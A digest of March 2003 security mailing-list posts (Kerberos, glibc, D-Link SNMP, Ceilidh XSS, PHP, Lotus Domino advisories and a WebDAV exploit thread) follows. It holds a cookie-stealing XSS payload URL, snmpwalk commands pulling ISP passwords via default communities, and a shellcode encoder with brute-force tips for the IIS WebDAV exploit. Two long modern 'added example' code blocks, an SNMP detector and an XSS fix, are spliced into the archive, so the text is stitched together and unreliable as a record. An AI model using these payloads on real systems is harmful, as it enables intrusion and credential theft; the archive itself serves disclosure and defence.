cause a denial of service (crash) on KDCs within the same realm using a
certain protocol request that causes an out-of-bounds read of an array
(CAN-2003-0072).

The Key Distribution Center (KDC) allows remote, authenticated attackers
to cause a denial of service (crash) on KDCs within the same realm using a
certain protocol request that causes the KDC to corrupt its heap
(CAN-2003-0082).

A vulnerability in Kerberos before version 1.2.3 allows users from one
realm to impersonate users in other realms that have the same inter-realm
keys (CAN-2003-0059). Red Hat Linux 7.3 and later are not affected by this
issue.

The MIT advisory for these issues also mentions format string
vulnerabilities in the logging routines (CAN-2003-0060). Previous versions
of the kerberos packages from Red Hat already contain fixes for this issue.

Vulnerabilities have been found in the support for triple-DES keys in the
implementation of the Kerberos IV authentication protocol which is included
in MIT Kerberos (CAN-2003-0139).

Vulnerabilities have been found in the Kerberos IV authentication protocol
which allow an attacker with knowledge of a cross-realm key, which is
shared with another realm, to impersonate any principal in that realm to
any service in that realm. This vulnerability can only be closed by
disabling cross-realm authentication in Kerberos IV (CAN-2003-0138).

Vulnerabilities have been found in the RPC library used by the kadmin
service in Kerberos 5. A faulty length check in the RPC library exposes
kadmind to an integer overflow which can be used to crash kadmind
(CAN-2003-0028).

All users of Kerberos are advised to upgrade to these errata packages,
which disable cross-realm authentication by default for Kerberos IV and
which contain backported patches that correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directory *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. RPMs required:

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/krb5-1.1.1-40.src.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/krb5-configs-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-devel-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-libs-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-server-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-workstation-1

Re: Security Advisory - MyTaxexpress 2003

2003-03-27 Thread HCTITS Security Division
Did this guy miss the discussion about this very issue like, two weeks
ago?

I think the ultimate resolution of that discussion was that users are
lazy and stupid ("uninformed"), not likely to change defaults or be
savvy enough to use third-party encryption software, much less be
inclined to have to engage in that extra step.

There comes a point when we must wash our hands of the matter and leave
the user's security up to the user.  Inform them, yes, but leave them to
their own informed peril.

It sounds like most tax software does not encrypt personal data and
stores it in predictable locations.  I think a better tack on this
matter is to take steps to prevent the data from being accessible to
outside attackers.  Inform users how to disable the insecure default
shares that some OSes create and how to protect their computers from
many data-compromising vulnerabilities.  For example, "My Documents"
shouldn't be allowed to be accessible from outside anyway.

Or we could all do our taxes on paper, hand-deliver them to their
respective agents, keep our record copies in 6-inch hardened-steel
glass-packed (remember The Score?) fireproof safes, and crosscut-shred,
bleach, and burn any other paperwork with sensitive information.  

Regards,
~Brian


On Tue, 2003-03-25 at 14:46, Nathan Wosnack wrote:
> 
> 
> Original Advisory: Tuesday, March 25, 2003
> 
> Severity: Medium - High
> 
> Description: Unencrypted tax-return information saved in C:\My Documents 
> by default can pose security risks, and may disclose financial/personal 
> information to the Internet via peer-to-peer (P2P) networks.
> 
> Version: Tested on the version released March 20, 2003
> 
> Authors: David Coomber and Nathan Wosnack were involved in the research 
> and development.
> 
> Tax Software Background:
> 
> MyTaxexpress 2003 is a CCRA (Canada Customs and Revenue Agency) certified 
> GUI application developed by ExpressInfo Software that allows Canadian tax 
> payers located in Alberta, British Columbia, and Ontario to work through 
> their tax returns and file them electronically using a tax filing system 
> known as NETFILE.
> 
> Description of the problem:
> 
> If you decide to save your return, your personal information is saved to 
> your computer unencrypted in the directory C:\My Documents by default with 
> a *.ret extension. The problem with this is two-fold; if someone is able 
> to access this file, then all they would need to do is open it with a text 
> editor such as Notepad to reveal personal information. The personal 
> information disclosed includes your full name, your address, your social 
> insurance number, your earnings, spending claims, where you work, etc. 
> Saving your tax files in C:\My Documents makes it easier to get a hold of 
> since many Microsoft Windows users share C:\My Documents when using P2P 
> programs without understanding the consequences. Also, many P2P file-
> sharing networks have been known to share the C:\My Documents folder. One 
> such example of a file sharing program that does this is a program 
> called 'Kazaa' (with K++ extensions). With a simple query on Kazaa, 
> looking up file names such as 'taxes 2003.ret', 'taxes.ret', one could 
> gather large amounts of data on unsuspecting users that have C:\My 
> Documents shared.
> 
> Recommendations:
> 
> Due to the fact that MyTaxexpress does not encrypt your tax return when 
> saved to disk, and stores it in C:\My Documents by default, the risk of 
> having personal financial information stolen and used for illegal purposes 
> is high. In order to protect this financial information from disclosure 
> and misuse, we recommend saving your returns in a different directory and 
> encrypting your returns (and all other personal information) with a strong 
> encryption program such as Blowfish for Windows(1) or similar.
> 
> Related Links:
> 
> http://www.pivx.com/ - Related advisories focusing on United States tax 
> software.
> 
> http://www.hypervivid.com/ - Information, Telecom and Wireless Security 
> Consulting Firm.
> 
> Vendor Contact:
> 
> http://www.mytaxexpress.com/ - ExpressInfo software.
> 
> Have any questions or comments?
> e-mail: [EMAIL PROTECTED]
> 
> Copyright © 2003, Hypervivid Solutions Incorporated. All Rights Reserved. 
> (1) Note: We are not affiliated with any products or services mentioned on 
> this page, we provide the links solely as a convenience to the reader.




TSLSA-2003-0014 - glibc

2003-03-27 Thread Trustix Secure Linux Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2003-0014

Package name:  glibc
Summary:   xdr / rpc
Date:  2003-03-26
Affected versions: TSL 1.1, 1.2, 1.5

- --
Package description:
  The glibc package contains standard libraries which are used by multiple
  programs on the system. In order to save disk space and memory, as well as to
  make upgrading easier, common system code is kept in one place and shared
  between programs. This particular package contains the most important sets of
  shared libraries: the standard C library and the standard math library.
  Without these two libraries, a Linux system will not function.  The glibc
  package also contains national language (locale) support and timezone
  databases.


Problem description:
   An integer overflow was discovered in the xdrmem_getbytes() function of
   glibc 2.3.1 and earlier.  This function is part of the XDR encoder/decoder
   derived from Sun's RPC implementation.  
   
   This vulnerability might cause buffer overflows and could possibly be
   exploited to execute arbitrary code.



Action:
  We recommend that all systems with this package installed be upgraded.


Location:
  All TSL updates are available from
  http://www.trustix.net/pub/Trustix/updates/
  ftp://ftp.trustix.net/pub/Trustix/updates/


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.

  Get SWUP from:
  ftp://ftp.trustix.net/pub/Trustix/software/swup/


Public testing:
  These packages have been available for public testing for some time.
  If you want to contribute by testing the various packages in the
  testing tree, please feel free to share your findings on the
  tsl-discuss mailinglist.
  The testing tree is located at
  http://www.trustix.net/pub/Trustix/testing/
  ftp://ftp.trustix.net/pub/Trustix/testing/
  

Questions?
  Check out our mailing lists:
  http://www.trustix.net/support/


Verification:
  This advisory along with all TSL packages are signed with the TSL sign key.
  This key is available from:
  http://www.trustix.net/TSL-GPG-KEY

  The advisory itself is available from the errata pages at
  http://www.trustix.net/errata/trustix-1.2/ and
  http://www.trustix.net/errata/trustix-1.5/
  or directly at
  http://www.trustix.net/errata/misc/2003/TSL-2003-0014-glibc.asc.txt


MD5sums of the packages:
- --
fe9c277153f6d22fdafd8a214401563f  ./1.5/SRPMS/glibc-2.1.3-22tr.src.rpm
a10d5a882dc223fbbac01f0693537da4  ./1.5/RPMS/nscd-2.1.3-22tr.i586.rpm
e5a446cd2fb6989d15614d71c7d0177c  ./1.5/RPMS/glibc-profile-2.1.3-22tr.i586.rpm
e40a865a6369976eb600853548c34527  ./1.5/RPMS/glibc-devel-2.1.3-22tr.i586.rpm
14dab8234b4c08ff4cbd31fde948d1f1  ./1.5/RPMS/glibc-2.1.3-22tr.i586.rpm
fe9c277153f6d22fdafd8a214401563f  ./1.2/SRPMS/glibc-2.1.3-22tr.src.rpm
4c4cab0eba6f73076e507efe1e2f06dc  ./1.2/RPMS/nscd-2.1.3-22tr.i586.rpm
3262c2d809b651441af57ec792dfed11  ./1.2/RPMS/glibc-profile-2.1.3-22tr.i586.rpm
6c48f30edec63f62a8cf1d763c734c1c  ./1.2/RPMS/glibc-devel-2.1.3-22tr.i586.rpm
97f7bd6d43c497b5978a8d86928027b3  ./1.2/RPMS/glibc-2.1.3-22tr.i586.rpm
fe9c277153f6d22fdafd8a214401563f  ./1.1/SRPMS/glibc-2.1.3-22tr.src.rpm
885a9828bf112e1b123bb24deda2191c  ./1.1/RPMS/nscd-2.1.3-22tr.i586.rpm
da31eac54e4c326df5e28035d754df23  ./1.1/RPMS/glibc-profile-2.1.3-22tr.i586.rpm
c177de4109b197c58021f8b32808f611  ./1.1/RPMS/glibc-devel-2.1.3-22tr.i586.rpm
155859e8c46919b1f9679a9746776b9a  ./1.1/RPMS/glibc-2.1.3-22tr.i586.rpm
- --


Trustix Security Team

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+gbm2wRTcg4BxxS0RArWpAJ9M+MprUO3XBQUZi86wuccmXlAHhwCdFB8k
wCChErohnZMFiLzXyII5nm8=
=O4dd
-END PGP SIGNATURE-


SNMP security issues in D-Link DSL Broadband Modem/Router

2003-03-27 Thread Arhont Information Security


Arhont Ltd  -   Information Security Company

Arhont Advisory by: Andrei Mikhailovsky (www.arhont.com)
Advisory:   D-Link DSL Broadband Modem/Router 
Router Model Name:  D-Link DSL-500
Model Specific: Other models might be vulnerable as well
Manufacturer site:  http://www.dlink.com
Manufacturer contact (UK):  Tel: 0800 9175063 / 0845 0800288
Contact Date:   06/03/2003

DETAILS:

While performing a general security testing of a
network, we have found several security vulnerability
issues with the D-Link DSL Broadband Modem DSL-500

Issue 1:
The default router installation enables an SNMP (Simple
Network Management Protocol) server with default
community names for read and read/write access. The
DSL-500 modem is configured to allow SNMP access from the
WAN (Wide Area Network)/Internet side as well as from the LAN.

[EMAIL PROTECTED]:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
Copyright (c) 2000 Dlink Corp.
sysObjectID.0 = OID: enterprises.171.10.30.1
sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47
...
...

The community name: public 

allows read access to the mentioned devices, allowing
enumeration and gathering of sensitive network
information.  

The community name: private 

allows read/write access to devices, thus allowing
change of the network settings of the broadband modem.

Impact: This vulnerability allows local and internet
malicious attackers to retrieve and change network
settings of the modem.

Risk Factor: Medium/High

Possible Solutions:  Firewall UDP port 161 from LAN/WAN
sides, as it is not possible to disable SNMP service
from the web management interface.

Issue 2:
The ISP account information, including login name and
password, is stored on the modem without encryption. It
is therefore possible to retrieve this information with
a simple SNMP gathering utility such as snmpwalk:

[EMAIL PROTECTED]:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
...
...
...
transmission.23.2.3.1.5.2.1 = STRING:
"[EMAIL PROTECTED]"
...
...
transmission.23.2.3.1.6.2.1 = STRING: "password-string"
...
...
... 

Impact: This vulnerability allows LAN and internet
malicious attackers to retrieve confidential information.

Risk Factor: Very High

Possible Solutions:  As a temporary solution you should
firewall UDP port 161 from LAN/WAN sides, as it is not
possible to disable SNMP service from the web
management interface.

According to the Arhont Ltd. policy, all of the found
vulnerabilities and security issues will be reported to
the manufacturer 7 days before releasing them to the
public domains (such as CERT and BUGTRAQ), unless
specifically requested by the manufacturer.

If you would like to get more information about this
issue, please do not hesitate to contact Arhont team at
[EMAIL PROTECTED]


Kind Regards,

Andrei Mikhailovsky
Arhont Ltd
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key:   0xFF67A4F4
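A detection-side counterpart to the snmpwalk output above, added here as an example and not part of the Arhont advisory: a minimal SNMPv1/v2c message parser of the kind a packet-capture script or an IDS rule would apply to UDP/161 traffic, which flags datagrams carrying a default community string ("public"/"private"), SetRequests (the read/write case the advisory describes), and requests that reached the device on the WAN side. The interface names (eth0, ppp0) and the sample datagram are constructed; the PDU tag values are those defined for SNMPv1 in RFC 1157.

```python
"""Flag risky SNMP datagrams: default communities, writes, WAN-side requests.

Added example (not the advisory's or D-Link's code).  Interface names and the
sample datagram are constructed for the demonstration.
"""
from dataclasses import dataclass

DEFAULT_COMMUNITIES = {b"public", b"private"}

# SNMPv1 PDU tags (RFC 1157, context-specific constructed tags)
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest",
             0xA2: "GetResponse", 0xA3: "SetRequest", 0xA4: "Trap"}


def ber_tlv(buf: bytes, pos: int = 0):
    """Decode one BER TLV at buf[pos]; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long-form length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def encode_tlv(tag: int, payload: bytes) -> bytes:
    """Encode one BER TLV (used here only to build the constructed sample)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lenbytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lenbytes)]) + lenbytes + payload


@dataclass
class SnmpHeader:
    version: int          # 0 = SNMPv1, 1 = SNMPv2c
    community: bytes      # sent in clear text on the wire
    pdu_type: str


def parse_snmp(datagram: bytes) -> SnmpHeader:
    """Pull version, community and PDU type out of an SNMPv1/v2c message."""
    tag, body, _ = ber_tlv(datagram)
    if tag != 0x30:
        raise ValueError("not an SNMP message (outer SEQUENCE missing)")
    tag, ver, pos = ber_tlv(body)
    if tag != 0x02:
        raise ValueError("version INTEGER missing")
    tag, community, pos = ber_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("community OCTET STRING missing")
    pdu_tag, _, _ = ber_tlv(body, pos)
    return SnmpHeader(int.from_bytes(ver, "big"), community,
                      PDU_NAMES.get(pdu_tag, f"unknown(0x{pdu_tag:02x})"))


def assess(datagram: bytes, ingress_iface: str, wan_iface: str = "ppp0"):
    """Return the findings for one UDP/161 datagram (empty list = nothing to flag).

    ingress_iface / wan_iface are assumed names: the interface the packet
    arrived on and the WAN-facing interface of the modem.
    """
    hdr = parse_snmp(datagram)
    findings = []
    if hdr.community in DEFAULT_COMMUNITIES:
        findings.append(f"default community {hdr.community.decode()!r} "
                        f"in {hdr.pdu_type}")
    if hdr.pdu_type == "SetRequest":
        findings.append("write attempt (SetRequest)")
    if ingress_iface == wan_iface:
        findings.append(f"SNMP reached the device from the WAN side ({wan_iface})")
    return findings


def sample_get_request(community: bytes, pdu_tag: int = 0xA0) -> bytes:
    """Constructed sample: a v1 request for sysDescr.0 (OID 1.3.6.1.2.1.1.1.0)."""
    oid = bytes([0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00])
    varbind = encode_tlv(0x30, encode_tlv(0x06, oid) + encode_tlv(0x05, b""))
    pdu = encode_tlv(pdu_tag,
                     encode_tlv(0x02, b"\x01")      # request-id
                     + encode_tlv(0x02, b"\x00")    # error-status
                     + encode_tlv(0x02, b"\x00")    # error-index
                     + encode_tlv(0x30, varbind))   # variable-bindings
    return encode_tlv(0x30, encode_tlv(0x02, b"\x00")     # version 0 = SNMPv1
                      + encode_tlv(0x04, community) + pdu)


if __name__ == "__main__":
    samples = [(b"public", 0xA0, "eth0"),      # LAN-side read with default community
               (b"private", 0xA3, "ppp0")]     # WAN-side write with default community
    for community, tag, iface in samples:
        for finding in assess(sample_get_request(community, tag), iface):
            print(f"{iface} {community.decode()}: {finding}")
```

Because the community string is a plain OCTET STRING in the message, the same parser run over a capture on the WAN interface also shows exactly what the advisory's "Possible Solutions" entry is defending against: anyone who can reach UDP/161 can read it off the wire or simply try the defaults, so blocking the port at the perimeter is the only control the device itself offers.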


[SCSA-013] Cross Site Scripting vulnerability in testcgi.exe

2003-03-27 Thread Grégory




Security Corporation Security Advisory [SCSA-013]


PROGRAM: Ceilidh
HOMEPAGE: http://www.lilikoi.com
VULNERABLE VERSIONS: 2.70 and prior



DESCRIPTION


"Ceilidh is a Web-based threaded discussion engine that features 
automatic text to HTML conversion, file attachment, e-mail 
notification, automatic message expiration, multiple levels of 
security and much more."
(direct quote from http://www.lilikoi.com) 


DETAILS & EXPLOITS


¤ Cross Site Scripting :

An exploitable bug was found in Ceilidh which causes script
execution on the client's computer when following a crafted URL.

This kind of attack, known as a "Cross-Site Scripting Vulnerability", is 
present in the testcgi.exe file; an attacker can input specially crafted 
links and/or other malicious scripts.

- Exploits : 

http://[target]/cgi-bin/testcgi.exe?[hostile_code]

The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by <>)


SOLUTIONS


No solution for the moment.


VENDOR STATUS 


The vendor has reportedly been notified.


LINKS


- http://www.security-corp.org/index.php?ink=4-15-1

- French version:
http://www.security-corporation.com/index.php?id=advisories&a=013-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
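The reflection pattern the advisory describes, beside its hardened form, as an added example (not Ceilidh's code, whose source is not on the page): a CGI that echoes its query string into the page must HTML-escape the value before it is written out, and should send headers that limit what an injected fragment could do even if one escape is missed. The function names, the HTML template and the header policy are assumptions; the probe string is constructed.

```python
"""Reflected XSS in a query-string echo: the weak pattern beside the fix.

Added example, not code from Ceilidh or Lilikoi.  Function names, the
template and the header set are assumptions; the probe below is constructed.
"""
import html
from urllib.parse import unquote_plus

TEMPLATE = "<html><body><p>You requested: {}</p></body></html>"


def render_unsafe(query_string: str) -> str:
    """Writes the decoded query string into the page verbatim: the XSS pattern."""
    return TEMPLATE.format(unquote_plus(query_string))


def render_safe(query_string: str) -> str:
    """HTML-escapes the reflected value so any markup in it is shown as text.

    quote=True also escapes ' and ", which matters when a value lands inside
    an attribute rather than in element text.
    """
    decoded = unquote_plus(query_string)
    return TEMPLATE.format(html.escape(decoded, quote=True))


def response_headers() -> dict:
    """Defense-in-depth headers to send with the page (assumed policy)."""
    return {
        # an explicit charset stops browsers guessing an encoding that
        # would let alternative byte sequences form a '<'
        "Content-Type": "text/html; charset=utf-8",
        # no inline script: a reflected <script> block would not execute
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_active_markup(page: str) -> bool:
    """Crude regression check: does the rendered page carry a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    probe = "%3Cscript%3Eprobe()%3C%2Fscript%3E"      # constructed probe
    print("unsafe:", render_unsafe(probe))
    print("safe:  ", render_safe(probe))
```

The `contains_active_markup` check is the kind of assertion to keep in the CGI's test suite: it fails on the unescaped output and passes on the escaped one, so a future change that drops the escaping is caught before deployment.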





@(#)Mordred Labs advisory - PHP for Win32: buffer overflow in openlog() function

2003-03-27 Thread sir.mordred

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

//@(#) Mordred Security Labs advisory

Release date: March 27, 2003
Name: PHP for Windows - buffer overflow in openlog() function
Versions affected: all versions for Windows platforms
Risk: average
Author: Sir Mordred ([EMAIL PROTECTED])

I. Description:

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Please visit http://www.php.net for more information about PHP.

II. Details:

There exists a classic stack overflow in the openlog() function and the
following short script will illustrate this vulnerability:

$ cat t1.php


III. Platforms tested

Windows 200 with IIS 5.0 / PHP 4.3.1

IV. Workaround

Not available at the time of writing.

V. Vendor

PHP developers notified.


-BEGIN PGP SIGNATURE-
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wmAEARECACAFAj6DH5sZHHNpci5tb3JkcmVkQGh1c2htYWlsLmNvbQAKCRAOkXvN4BZr
fN4fAJ9EhQBM1k8JukU4JjZ6VTVVi5k/IwCeO8GoK/V4zuG7HbAgXkb2CNlXelg=
=t5SO
-END PGP SIGNATURE-






Fwd: CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

2003-03-27 Thread Muhammad Faisal Rauf Danka


Regards

Muhammad Faisal Rauf Danka


*** There is an attachment in this mail. ***

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

--- Begin Message ---


-BEGIN PGP SIGNED MESSAGE-

CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

   Original release date: March 26, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

 * Lotus Notes and Domino versions prior to 5.0.12 and 6.0 Gold
 * VU#571297 affects 5.0.12, 6.0.1 and prior versions.

Overview

   Multiple  vulnerabilities  have  been  reported  to affect Lotus Notes
   clients  and Domino servers. Multiple reporters, the close timing, and
   some ambiguity caused confusion about what releases are vulnerable. We
   are  issuing  this  advisory  to  help  clarify  the  details  of  the
   vulnerabilities,  the  versions affected, and the patches that resolve
   these issues.

I. Description

   In  February  2003, NGS Software released several advisories detailing
   vulnerabilities  affecting  Lotus  Notes  and  Domino.  The  following
   vulnerabilities  reported  by  NGS  Software  affect versions of Lotus
   Domino prior to 5.0.12 and 6.0:

 VU#206361   -  Lotus  iNotes  vulnerable  to  buffer  overflow  via
 PresetFields FolderName field
 Lotus Technical Documentation: KSPR5HUQ59
 NGS Software's Advisory: NISR17022003b

 VU#355169 - Lotus Domino Web Server vulnerable to denial of service
 via incomplete POST request
 Lotus Technical Documentation: KSPR5HTQHS
 NGS Software's Advisory: NISR17022003d

 VU#542873   -  Lotus  iNotes  vulnerable  to  buffer  overflow  via
 PresetFields s_ViewName field
 Lotus Technical Documentation: KSPR5HUPEK
 NGS Software's Advisory: NISR17022003b

 VU#772817  -  Lotus Domino Web Server vulnerable to buffer overflow
 via  non-existent  "h_SetReturnURL"  parameter  with an overly long
 "Host Header" field
 Lotus Technical Documentation: KSPR5HTLW6
 NGS Software's Advisory: NISR17022003a

   The  following vulnerability reported by NGS Software affects versions
   of Lotus Domino up to and including 5.0.12 and 6.0.1:

 VU#571297  -  Lotus  Notes  and  Domino  COM Object Control Handler
 contains buffer overflow
 Lotus Technical Documentation: SWG21104543
 NGS Software's Advisory: NISR17022003e

   VU#571297  was  originally  reported  as  a vulnerability in an iNotes
   ActiveX  control.  The  vulnerable  code  is not specific to iNotes or
   ActiveX.  The  iNotes  ActiveX  control  was  an attack vector for the
   vulnerability and is not the affected code base. Because this issue is
   not  specific  to  ActiveX,  Lotus  Notes  clients  and Domino Servers
   running on platforms other than Microsoft Windows may be affected.

   In March 2003, Rapid7, Inc. released several advisories. The following
   vulnerabilities,  reported  by  Rapid7, Inc., affect versions of Lotus
   Domino prior to 5.0.12:

 VU#433489 - Lotus Domino Server susceptible to a pre-authentication
 buffer overflow during Notes authentication
 Lotus Technical Documentation: DBAR5CJJJS
 Rapid7, Inc.'s Advisory: R7-0010

 VU#411489  -  Lotus Domino Web Retriever contains a buffer overflow
 vulnerability
 Lotus Technical Documentation: KSPR5DFJTR
 Rapid7, Inc.'s Advisory: R7-0011

   Rapid7,  Inc.  also  discovered that Lotus Domino pre-release and beta
   versions of 6.0 were also affected by the following vulnerability:

 VU#583184  -  Lotus  Domino  R5  Server  Family  contains  multiple
 vulnerabilities in LDAP handling code
 Lotus Technical Documentation: DWUU4W6NC8
 Rapid7, Inc.'s Advisory: R7-0012

   VU#583184  was  a  regression  of  the  PROTOS  LDAP  Test-Suite  from
   CA-2001-18 and was originally fixed in 5.0.7a.

II. Impact

   The  impact  of  these vulnerabilities range from denial of service to
   data  corruption  and  the  potential  to  execute arbitrary code. For
   details  about  the impact of a specific vulnerability, please see the
   related vulnerability note.

III. Solution

 Upgrade

   Most  of  these  vulnerabilities  are  resolved in versions 5.0.12 and
   6.0.1 of Lotus Domino.

   Only  VU#571297,  "Lotus  Notes  and Domino COM Object Control Handler
   contains  buffer  overflow,"  is  not  resolved  in  5.0.12, or 6.0.1.
   Critical  Fix  1  for 6.0.1 was released on March 18, 2003, to resolve
   this issue for both the Notes client and Domino server.

 Apply a patch

   Patches  are  available  for  some  vulnerabilities.  Please  view the
   

Re: SNMP security issues in D-Link DSL Broadband Modem/Router

2003-03-27 Thread m.singh
I told dlink about this problem last year, in September. They told me they would release a fix. 
I have not seen a fix. 
It looks like dlink will not be doing anything about this problem. 

In future I will post here as well. 

Thanks 

Malkit Singh

> 
> From: Arhont Information Security <[EMAIL PROTECTED]>
> Date: 2003/03/27 Thu PM 03:31:41 GMT
> To: [EMAIL PROTECTED]
> Subject: SNMP security issues in D-Link DSL Broadband Modem/Router


Re: WebDAV exploit: using wide character decoder scheme

2003-03-27 Thread Roman Medina
On Wed, 26 Mar 2003 11:14:43 -0500, you wrote:

>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<
>> "%u32ac%u77e2",

 I tried the "%u trick" while coding the rs_iis.c exploit and it happened
as Dave stated, so I forgot the idea. I was using Spanish W2k Server +
SP2.

 Another problem with Mat's exploit is that it seems not to check well
whether the exploit is successful or not. When the exploit succeeds
(which is impossible at least in Spanish/US Windows versions due to
the %u problem), IIS will neither respond nor close the connection, so
the exploit keeps waiting until the 15 secs timer expires. Then
$flagexit=1 and the sendraw2 function returns "Timeout", so the main program
will print "Failed to exploit: Server not crashed\n". This is wrong.
It should have printed something like "Success". It looks like a silly
issue but perhaps the people (with Japanese Windows version?) trying
the exploit never noticed it was successful.

 Related to my exploit and after receiving some feedback (thanks
ppl!), I'd like to clarify:
1) The offset between the start of the string and the address where
RET is placed could change. What I did was to put many instances of
the RET value so chances of a right guess were higher. This covers the
cases where the offset is incremented or decremented by a 2*x value.
Nevertheless, there will be an alignment problem if the offset changes by
(2*x+1). In that case, the least significant byte of RET becomes the
most significant one.  Fermín J. Serna <[EMAIL PROTECTED]> pointed out the
easy solution: use a RET value with the two bytes being identical. So
the recommended way to perform a brute force attack with rs_iis.c is
to try: 0x0101, 0x0202, 0x0303, ..., 0x (255 possible RET values).
2) I've attached a bash script which demonstrates this and makes
testing of a vulnerable machine easier. You should adjust the
TIMEOUT variable (in seconds), so IIS is alive when the script tries a
new RET value.

 Regards,
 --Roman

--
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]


rs_brute.sh
Description: Binary data


Re: WebDAV exploit: using wide character decoder scheme

2003-03-27 Thread JW Oh
In-Reply-To: <[EMAIL PROTECTED]>

>
>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<

I tested it only on the Korean version of Windows (Server and Professional 
editions).

>
>This exploit must be much easier to get reliable on other language
>versions. A shame, really.

Shame???

>
>Did you use my encoder or did you write your shellcode manually, just
>out of curiosity?

The encoding scheme is so simple.

This is the shellcode encoder.

-
/*
[EMAIL PROTECTED]
[EMAIL PROTECTED]

Shellcode encoder for webdav exploit.
*/
#include <stdio.h>   /* header name assumed: the bracketed name was lost from the post */


int is_special(unsigned char num1)
{
    return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 ||
            num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f ||
            num1==0x2b || num1==0xb || num1==0x5c);
}


void main()
{
    int debug=0;
    int rc;
    unsigned char buffer[512];
    while(rc=read(0,buffer,sizeof(buffer)))
    {
        int i;
        for(i=0;i
-

/* Second program from the post: enumerates the two-byte values that the
   active code page can convert without substituting the default character
   (header names assumed: the bracketed names were lost from the post). */
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char* argv[])
{
    unsigned char i;
    unsigned char j;

    for(i=0;i<255;i++)
    {
        for(j=0;j<255;j++)
        {
            char string_to_copy[3];
            WCHAR src[256]={0,};
            char dest[256]={0,};

            string_to_copy[0]=i;
            string_to_copy[1]=j;
            string_to_copy[2]=0;
            memcpy(src,string_to_copy,strlen(string_to_copy));
            BOOL lpUsedDefaultChar;

            WideCharToMultiByte
                (CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);

            if(!lpUsedDefaultChar)
            {
                printf("%.2x%.2x\n",j,i);
            }
        }
    }

    return 0;
}
-

>
>Dave Aitel
>Advanced Engineering Directorate
>Immunity, Inc.
>http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the
>movies."
>
>On Wed, 26 Mar 2003 22:55:12 +0900
>JW Oh <[EMAIL PROTECTED]> wrote:
>> my @return_addresses=(
>> "%u32ac%u77e2",
>> "%uc1b5%u76ae",
>> "%u005d%u77a5",
>


RE: FUD-ALARM: @(#)Mordred Labs advisory - Integer overflow in PHP memory allocator

2003-03-27 Thread Stefan Esser

Hello Mr. Mordred (and the rest of the Bugtraq readers),

I happily repeat everything I wrote to you before. Your advisories are
FUD. You release an advisory called: Integer overflow in PHP memory
allocator, rate it as High Risk, but you present the reader some stupid
crash bug in the socket extension that is marked as experimental and
is not enabled by default. I told you before that the integer overflow
cannot be used to exploit PHP. If you find a single emalloc call
where some user supplied value is able to allocate a block in the size 
